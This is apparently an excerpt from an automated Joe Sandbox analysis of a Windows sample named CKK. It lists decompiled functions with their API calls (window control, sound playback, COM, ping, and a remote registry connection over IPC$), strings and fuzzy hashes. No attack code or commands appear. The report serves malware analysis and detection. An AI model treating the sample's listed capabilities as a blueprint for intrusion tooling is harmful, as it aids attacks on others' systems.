                                                                                              • Opcode Fuzzy Hash: be98ebf8f2b2f86ab4c0fcdd340b9ae14e98f474235757da09bd31f30c6fd16f
                                                                                              • Instruction Fuzzy Hash: A9316071901129BBD721CB94DC88EFFBB7CEF45760F008169A909E3141D6749A469BB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • timeGetTime.WINMM ref: 00A5E6B4
                                                                                                • Part of subcall function 00A0E551: timeGetTime.WINMM ref: 00A0E555
                                                                                              • Sleep.KERNEL32(0000000A), ref: 00A5E6E1
                                                                                              • EnumThreadWindows.USER32 ref: 00A5E705
                                                                                              • FindWindowExW.USER32 ref: 00A5E727
                                                                                              • SetActiveWindow.USER32 ref: 00A5E746
                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A5E754
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00A5E773
                                                                                              • Sleep.KERNEL32(000000FA), ref: 00A5E77E
                                                                                              • IsWindow.USER32 ref: 00A5E78A
                                                                                              • EndDialog.USER32 ref: 00A5E79B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                              • String ID: BUTTON
                                                                                              • API String ID: 1194449130-3405671355
                                                                                              • Opcode ID: 75c91c962aba3154b39b9072fe5081ee036cd6cc4715e5ec5b8291db2e90619f
                                                                                              • Instruction ID: 82b2077c8421511d5cdc3a6d2fddaeb92164863dc1b1a5355fd832fc5563422a
                                                                                              • Opcode Fuzzy Hash: 75c91c962aba3154b39b9072fe5081ee036cd6cc4715e5ec5b8291db2e90619f
                                                                                              • Instruction Fuzzy Hash: E221A1B1200244AFEB04DFA0ECC9F253B69FB5539AF111434F951825A2DF71AD0A9F34
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD
                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A5EA5D
                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A5EA73
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A5EA84
                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A5EA96
                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A5EAA7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString$_wcslen
                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                              • API String ID: 2420728520-1007645807
                                                                                              • Opcode ID: 1b136cfd8cfe59d50d3c0edcb18c6b82125076968fa6998bf1971ea315e97720
                                                                                              • Instruction ID: bfb738db95dc9cac215c27d8d1fb812a9a652336dcef4231c9a6cc283c740c17
                                                                                              • Opcode Fuzzy Hash: 1b136cfd8cfe59d50d3c0edcb18c6b82125076968fa6998bf1971ea315e97720
                                                                                              • Instruction Fuzzy Hash: D1115131A5022D79D724E7B1DC4AEFF7A7CFBD1B41F400829B911A20D1EAB40A45C6B0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00A55CE2
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A55CFB
                                                                                              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004), ref: 00A55D59
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00A55D69
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A55D7B
                                                                                              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004), ref: 00A55DCF
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00A55DDD
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A55DEF
                                                                                              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00A55E31
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00A55E44
                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A55E5A
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00A55E67
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                              • String ID:
                                                                                              • API String ID: 3096461208-0
                                                                                              • Opcode ID: aa43f2a8e0c7dfc1798a2aa1e2d9c226d9d373036011f897d3ca917104ca7799
                                                                                              • Instruction ID: ffd1472167083d6d6861b921cf8fec93773ff89d8d54eea7eb67a01668b70352
                                                                                              • Opcode Fuzzy Hash: aa43f2a8e0c7dfc1798a2aa1e2d9c226d9d373036011f897d3ca917104ca7799
                                                                                              • Instruction Fuzzy Hash: DF51FE71E00605AFDF18CFA8DD99AAEBBB5BF48311F148129F915E6290E7709E05CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A08F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00A08FC5
                                                                                              • DestroyWindow.USER32 ref: 00A08C81
                                                                                              • KillTimer.USER32 ref: 00A08D1B
                                                                                              • DestroyAcceleratorTable.USER32 ref: 00A46973
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00A08BBA,00000000,?), ref: 00A469A1
                                                                                              • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00A08BBA,00000000,?), ref: 00A469B8
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00A08BBA,00000000), ref: 00A469D4
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A469E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                              • String ID:
                                                                                              • API String ID: 641708696-0
                                                                                              • Opcode ID: 34d94fa5486aa4953a118b5c55c90c59067b31536b8aeef12d6711e464dcb5c1
                                                                                              • Instruction ID: dca589b830747a064fe4931bf27f4bf3edf48cd4c900bd6d54908c3a995556c8
                                                                                              • Opcode Fuzzy Hash: 34d94fa5486aa4953a118b5c55c90c59067b31536b8aeef12d6711e464dcb5c1
                                                                                              • Instruction Fuzzy Hash: C061BF30602604DFEB25DF64EA48B2577F1FB42312F14452CE0829B9A1CB79AD92DF69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A09944: GetWindowLongW.USER32(?,000000EB), ref: 00A09952
                                                                                              • GetSysColor.USER32 ref: 00A09862
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ColorLongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 259745315-0
                                                                                              • Opcode ID: d20f43f4a37385496da65492a8a639af199f7676131a9da5e64ea4adaf235dd6
                                                                                              • Instruction ID: e98b3be99deda8f817879170465d73a66066dcdb96a789909de7e04658456d03
                                                                                              • Opcode Fuzzy Hash: d20f43f4a37385496da65492a8a639af199f7676131a9da5e64ea4adaf235dd6
                                                                                              • Instruction Fuzzy Hash: 1341B7711046489FDB209F78AC88BBA3765FB46371F148615F9A28B2F3D7319C46DB21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00A3F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00A59717
                                                                                              • LoadStringW.USER32(00000000,?,00A3F7F8,00000001), ref: 00A59720
                                                                                                • Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00A3F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00A59742
                                                                                              • LoadStringW.USER32(00000000,?,00A3F7F8,00000001), ref: 00A59745
                                                                                              • MessageBoxW.USER32 ref: 00A59866
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString$Message_wcslen
                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                              • API String ID: 747408836-2268648507
                                                                                              • Opcode ID: 0b2521d2de69238a526777c138752d2b8858eb10e2288b89e1720986264cf6bb
                                                                                              • Instruction ID: 174fbf6f86ea86fea2b86f31300102ed606d54931038d58e83464470111cbb94
                                                                                              • Opcode Fuzzy Hash: 0b2521d2de69238a526777c138752d2b8858eb10e2288b89e1720986264cf6bb
                                                                                              • Instruction Fuzzy Hash: 62414A7280021DAACB04EBE0DE86FFEB778AF95341F504065F60676092EB756F49CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F6B57: _wcslen.LIBCMT ref: 009F6B6A
                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A507A2
                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A507BE
                                                                                              • RegOpenKeyExW.ADVAPI32 ref: 00A507DA
                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00A50804
                                                                                              • CLSIDFromString.OLE32(?,000001FE), ref: 00A5082C
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A50837
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A5083C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                              • API String ID: 323675364-22481851
                                                                                              • Opcode ID: 240a254ded8c7a731d0085dd2983ab06581e03081fb0f67da77523ccbe7a85a8
                                                                                              • Instruction ID: ccccd138e5e269271ef14ec9bf4f416a99d6b50d6a702840c029a7f4a3d23cd6
                                                                                              • Opcode Fuzzy Hash: 240a254ded8c7a731d0085dd2983ab06581e03081fb0f67da77523ccbe7a85a8
                                                                                              • Instruction Fuzzy Hash: 7541F572C1022DABDF15EBA4DC85EFDB7B8BF44390F444129E905A3161EB709E48CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CoInitialize.OLE32(00000000), ref: 00A67AF3
                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A67B8F
                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 00A67BA3
                                                                                              • CoCreateInstance.OLE32(00A8FD08,00000000,00000001,00AB6E6C,?), ref: 00A67BEF
                                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A67C74
                                                                                              • CoTaskMemFree.OLE32(?), ref: 00A67CCC
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00A67D57
                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A67D7A
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00A67D81
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00A67DD6
                                                                                              • CoUninitialize.OLE32 ref: 00A67DDC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 2762341140-0
                                                                                              • Opcode ID: 58eba975b5953144aded775386a3155396b365981b1f7e4c5721c0f4e697726a
                                                                                              • Instruction ID: 83935be02f850c1f5541b7d8c9e3973ca24f09701357f0c5433d82bd4e5dcb92
                                                                                              • Opcode Fuzzy Hash: 58eba975b5953144aded775386a3155396b365981b1f7e4c5721c0f4e697726a
                                                                                              • Instruction Fuzzy Hash: 04C10A75A04109AFCB14DFA4C884DAEBBF9FF48318B148499F91A9B261D730EE45CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A85504
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A85515
                                                                                              • CharNextW.USER32(00000158), ref: 00A85544
                                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A85585
                                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A8559B
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A855AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CharNext
                                                                                              • String ID:
                                                                                              • API String ID: 1350042424-0
                                                                                              • Opcode ID: 6310b5bd5e884491e245f027d3d0de69919843d4a8dcfff4e0b6d80821888aac
                                                                                              • Instruction ID: ad5e3872768ff484824259f519e7894cb3e1256c0d34890ee3feddfbdc36ab36
                                                                                              • Opcode Fuzzy Hash: 6310b5bd5e884491e245f027d3d0de69919843d4a8dcfff4e0b6d80821888aac
                                                                                              • Instruction Fuzzy Hash: 83617C35D04608AFDF10EFA4CC84AFE7BB9FF09721F108155F965A62A0D7748A81DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A4FAAF
                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00A4FB08
                                                                                              • VariantInit.OLEAUT32(?), ref: 00A4FB1A
                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00A4FB3A
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00A4FB8D
                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00A4FBA1
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A4FBB6
                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00A4FBC3
                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A4FBCC
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A4FBDE
                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A4FBE9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                              • String ID:
                                                                                              • API String ID: 2706829360-0
                                                                                              • Opcode ID: b06059a3a39ec6b0356f577181cc1bda2f03b42c490f1dd468d1d87316f65ff1
                                                                                              • Instruction ID: 18df22321bc1c83c87e5499fe3a3a5ff4c33fe3a6c6012c57286badfd6fba2fa
                                                                                              • Opcode Fuzzy Hash: b06059a3a39ec6b0356f577181cc1bda2f03b42c490f1dd468d1d87316f65ff1
                                                                                              • Instruction Fuzzy Hash: 2F413375A00219DFCB04DFA8DC58DAEBBB9FF48354F008069E956A7261D730E946CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00A705BC
                                                                                              • inet_addr.WSOCK32(?), ref: 00A7061C
                                                                                              • gethostbyname.WSOCK32(?), ref: 00A70628
                                                                                              • IcmpCreateFile.IPHLPAPI ref: 00A70636
                                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A706C6
                                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A706E5
                                                                                              • IcmpCloseHandle.IPHLPAPI(?), ref: 00A707B9
                                                                                              • WSACleanup.WSOCK32 ref: 00A707BF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                              • String ID: Ping
                                                                                              • API String ID: 1028309954-2246546115
                                                                                              • Opcode ID: 8d6d540539f1ad5e64e754e7ff7722d215f7c00ef70de107bd3c726e9d4dcdf2
                                                                                              • Instruction ID: c317edc2579be7545fbe97673e64416dbd82bbe00ee617d21c0b5ea2d1f7d615
                                                                                              • Opcode Fuzzy Hash: 8d6d540539f1ad5e64e754e7ff7722d215f7c00ef70de107bd3c726e9d4dcdf2
                                                                                              • Instruction Fuzzy Hash: C6918C35604601DFD324DF25C888F2ABBE0AF84328F14C5A9F5A99B6A2C770ED45CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$BuffCharLower
                                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                                              • API String ID: 707087890-567219261
                                                                                              • Opcode ID: a31a13858afef4cad0e119a774bf01636b02ad3ddfe21c6b71d813c1952400f5
                                                                                              • Instruction ID: 3935480f1d9310098d9b73e2fcb26c1061427f17a53ef86b291bb8cccd4aae8b
                                                                                              • Opcode Fuzzy Hash: a31a13858afef4cad0e119a774bf01636b02ad3ddfe21c6b71d813c1952400f5
                                                                                              • Instruction Fuzzy Hash: AA51A031A401169BCF24DF6CCD549BEB7A5BF64720B20C229E92AE72C5EB38DD40C790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CoInitialize.OLE32 ref: 00A73774
                                                                                              • CoUninitialize.OLE32 ref: 00A7377F
                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00A8FB78,?), ref: 00A737D9
                                                                                              • IIDFromString.OLE32(?,?), ref: 00A7384C
                                                                                              • VariantInit.OLEAUT32(?), ref: 00A738E4
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A73936
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                              • API String ID: 636576611-1287834457
                                                                                              • Opcode ID: 88d0a766f32c7a546859df4cbcb802c8d71b635977ff6e2d990bc4b64013704a
                                                                                              • Instruction ID: e26432a866f0a5a7a5569b4db2f3da32617715ba0c441a6f9627acd79f40b843
                                                                                              • Opcode Fuzzy Hash: 88d0a766f32c7a546859df4cbcb802c8d71b635977ff6e2d990bc4b64013704a
                                                                                              • Instruction Fuzzy Hash: 0561A172608301AFD710DF54CC89F6AB7E8EF88711F118809F9899B291D770EE49DB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(?), ref: 00A68257
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A68267
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A68273
